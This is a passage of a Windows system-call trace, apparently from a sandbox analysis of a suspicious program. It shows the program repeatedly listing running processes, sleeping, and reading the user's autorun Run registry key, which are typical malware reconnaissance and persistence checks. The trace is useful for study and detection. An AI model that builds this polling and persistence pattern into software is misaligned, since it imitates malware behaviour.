BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.389] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.390] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.390] NtClose (Handle=0x274) returned 0x0 [0174.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.399] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.399] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.399] NtClose (Handle=0x274) returned 0x0 [0174.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.408] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.409] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.409] NtClose (Handle=0x274) returned 0x0 [0174.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.438] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.440] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.441] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.441] NtClose (Handle=0x274) returned 0x0 [0174.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.473] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.475] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.475] NtClose (Handle=0x274) returned 0x0 [0174.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.492] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.493] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.493] NtClose (Handle=0x274) returned 0x0 [0174.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.503] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.504] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.504] NtClose (Handle=0x274) returned 0x0 [0174.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.513] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.518] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.519] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.519] NtClose (Handle=0x274) returned 0x0 [0174.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.530] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.531] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.531] NtClose (Handle=0x274) returned 0x0 [0174.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.545] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.546] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.546] NtClose (Handle=0x274) returned 0x0 [0174.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.565] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.566] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.566] NtClose (Handle=0x274) returned 0x0 [0174.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.582] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.583] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.583] NtClose (Handle=0x274) returned 0x0 [0174.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.590] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.594] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.594] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.595] NtClose (Handle=0x274) returned 0x0 [0174.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 